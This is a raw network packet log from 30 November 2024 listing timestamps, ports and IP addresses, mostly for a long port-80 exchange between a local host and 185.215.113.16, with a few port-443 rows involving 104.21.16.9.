Nov 30, 2024 04:06:35.930290937 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.930335045 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.930394888 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.930437088 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.932693958 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.932744026 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.932797909 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.932842970 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.935081005 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.935127020 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.935178041 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.935223103 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.937375069 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.937423944 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.937480927 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.937526941 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.939688921 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.939794064 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.939796925 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.939832926 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.941983938 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.942029953 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.942154884 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.942198992 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.944226980 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.944273949 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.944331884 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.944376945 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.946487904 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.946511984 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.946535110 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.946573019 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.948689938 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.948735952 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.948795080 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.948837996 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.950925112 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.950969934 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.951033115 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.951075077 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.953166962 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.953221083 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.953264952 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.953310966 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.955357075 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.955400944 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.955465078 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.955507994 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.957561970 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.957614899 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.957658052 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.957701921 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.959770918 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.959820986 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.959882021 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.959925890 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.961993933 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.962040901 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.962105989 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.962152004 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.964217901 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.964265108 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.964325905 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.964368105 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.966428041 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.966474056 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.966542006 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.966587067 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.968652010 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.968700886 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.968753099 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.968796968 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.971215963 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.971263885 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.971345901 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.971502066 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.973095894 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.973145008 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.973213911 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.973258018 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.975294113 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.975331068 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.975465059 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.975509882 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.977509975 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.977550983 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.977623940 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.977665901 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.979731083 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.979777098 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.979841948 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.979886055 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.981935024 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.981982946 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.982059002 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.982103109 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.984159946 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.984209061 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.984265089 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.984301090 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.986382008 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.986427069 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.986495972 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.986538887 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.988611937 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.988656998 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.988713980 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.988758087 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.990812063 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.990860939 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.990906954 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.990952015 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.993010998 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.993052006 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.993127108 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.993165970 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.995245934 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.995290995 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.995337963 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.995376110 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.997457027 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.997495890 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.997550964 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.997589111 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.999670029 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.999717951 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:35.999777079 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:35.999815941 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.002305031 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.002361059 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.002403021 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.002460957 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.004121065 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.004168034 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.004225016 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.004266977 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.006325006 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.006372929 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.006412983 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.006448984 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.008542061 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.008641958 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.008691072 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.010776043 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.010874987 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.010922909 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.012974024 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.013020992 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.013062954 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.014604092 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.015181065 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.015224934 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.015297890 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.015335083 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.017390966 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.017435074 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.017510891 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.017551899 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.019594908 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.019701958 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.019745111 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.021816969 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.021912098 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.021958113 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.024039984 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.024151087 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.024198055 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.026243925 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.026284933 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.026390076 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.026601076 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.028458118 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.028501987 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.028573036 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.028616905 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.030668020 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.030735970 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.030790091 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.053971052 CET	443	49823	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:36.054073095 CET	443	49823	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:36.054145098 CET	49823	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:36.054311037 CET	49823	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:36.054321051 CET	443	49823	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:36.115016937 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.115191936 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.115253925 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.115505934 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.115598917 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.115647078 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.117428064 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.117444992 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.117481947 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.117516994 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.118410110 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.118449926 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.118525982 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.118563890 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.120037079 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.120080948 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.120137930 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.120188951 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.121665001 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.121685028 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.121706963 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.121736050 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.123250961 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.123363018 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.123409033 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.124831915 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.124917984 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.124963045 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.126409054 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.126456022 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.126502991 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.126549959 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.128000021 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.128041983 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.128050089 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.128078938 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.129513025 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.129559040 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.129617929 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.130146980 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.131033897 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.131086111 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.131150961 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.131192923 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.132563114 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.132612944 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.132668018 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.132711887 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.134093046 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.134139061 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.134236097 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.134612083 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.135552883 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.135597944 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.135660887 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.135731936 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.137048960 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.137161016 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.137207985 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.138542891 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.138598919 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.138638973 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.138762951 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.139993906 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.140043974 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.140084982 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.140928030 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.141550064 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.141599894 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.141666889 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.141704082 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.142935991 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.142990112 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.143043041 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.143085957 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.144325972 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.144372940 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.144418955 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.144952059 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.145788908 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.145838022 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.145879984 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.145951986 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.147162914 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.147213936 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.147272110 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.148119926 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.148566961 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.148621082 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.148668051 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.148741007 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.149976969 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.150023937 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.150090933 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.150552988 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.151355028 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.151472092 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.151516914 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.152741909 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.152853966 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.152889013 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.154119968 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.154166937 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.154228926 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.154599905 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.155492067 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.155605078 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.155730009 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.156860113 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.156975031 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.157012939 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.158221006 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.158298016 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.158327103 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.158437967 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.159595966 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.159652948 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.159693003 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.159737110 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.160959005 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.161077023 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.161206007 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.162327051 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.162375927 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.162429094 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.162609100 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.163691998 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.163800955 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.163805962 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.163839102 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.165066004 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.165117979 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.165174961 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.165221930 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.166480064 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.166587114 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.166589975 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.166635036 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.167804003 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.167860985 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.167901993 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.167944908 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.169159889 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.169277906 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.169281960 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.170191050 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.170520067 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.170573950 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.170614004 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.170701027 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.171911001 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.171957016 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.172033072 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.172077894 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.173258066 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.173301935 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.173368931 CET	80	49822	185.215.113.16	192.168.2.4
